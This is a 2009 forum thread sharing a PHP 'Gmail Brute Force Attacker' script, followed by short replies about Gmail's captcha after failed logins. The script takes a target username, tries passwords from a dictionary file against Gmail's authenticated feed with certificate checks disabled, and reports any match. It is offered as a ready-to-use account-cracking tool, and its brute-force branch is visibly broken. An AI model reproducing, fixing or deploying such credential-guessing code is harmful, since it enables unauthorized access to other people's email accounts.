LinkBack URL
About LinkBacksCode:<?php ////////////////////// ////Gmail-Brute////// /////////////////////// //////////////////////// # This script was created to Brute Force G-Mail Logins,# #it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) # //////////////////////// $dic ="your Dictionary file here.txt"; /////////////////////// echo " <title>Gmail Brute Force Attacker</title> </head> <style type='text/css'> body { font:Verdana, Arial, Helvetica, sans-serif; font-size:12px; border-color:#FFFFFF; } .raster_table { background-color:#444444; border-color:#CCCCCC; } .alert { color:#FF0000; } </style> <body> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Gmail Brute Force Attacker</b></div> </td> </tr> </table> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> <form method='post'> Username to brute:<br> <input name='username' type='text' /><br><br> <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br> </form> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> </table> "; // Sets variables and retrives google error for comparing if(isset($_POST['attack']) && isset($_POST['username'])) { $username = $_POST['username']; $headers = array( "Host: mail.google.com", "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language: en-us,en;q=0.5", "Accept-Encoding: text", # No gzip, it only clutters your code! "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Date: ".date(DATE_RFC822) ); $c = curl_init('https://mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $wrong = curl_exec($c); // Get it curl_close($c); // Close the curl stream } //Dictionary Attack if($_POST['attack'] == "dictionary") { $Dictionary = file("$dic"); for ($Position = 0; $Position < count($Dictionary); $Position++) { $Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]); if(check_correct($username, $Dictionary[$Position])) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar y attack.</b></div> </td> </tr> </table>"; } //Brute Attack elseif($_POST['attack'] == "brute") { for ($Pass = 0; $Pass < 2; $Pass++) { if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; } if(check_correct($username, $Pass)) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for ce attack.</b></div> </td> </tr> </table>"; } echo "</body> </html>"; // Function for checking whether the username and password are correct function check_correct($username, $password) { global $wrong, $headers; $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $str = curl_exec($c); // Get it curl_close($c); if($str != $wrong) {return true;} else {return false;} } ?>
Original : Gmail BruteForcer [PHP Script] - Page 1
Results 1 to 5 of 5
Thread: Gmail BruteForcer [PHP Script]
- 24 Nov. 2009 02:15am #1
[PHP] Gmail BruteForcer Last edited by Eternal Darkness; 26 Nov. 2009 at 04:54pm. Reason: Title edit...
- 24 Nov. 2009 02:36am #2Mr. Aids
- Age
- 30
- Join Date
- Nov. 2009
- Location
- Anaheim, California
- Posts
- 1,065
- Reputation
- 99
- LCash
- 200.00
Fairly nice, thank you.
Originally Posted by La Vie Cruelle 
- 24 Nov. 2009 02:40am #3 No Problem.... Originally Posted by Chris
- 24 Nov. 2009 06:49am #4
Does Gmail not have a max login attempts feature?
- 24 Nov. 2009 03:08pm #5 Well no but it does have after about 5 logins that are incorrect, a captcha comes up.... Originally Posted by GAMEchief
Reply With Quote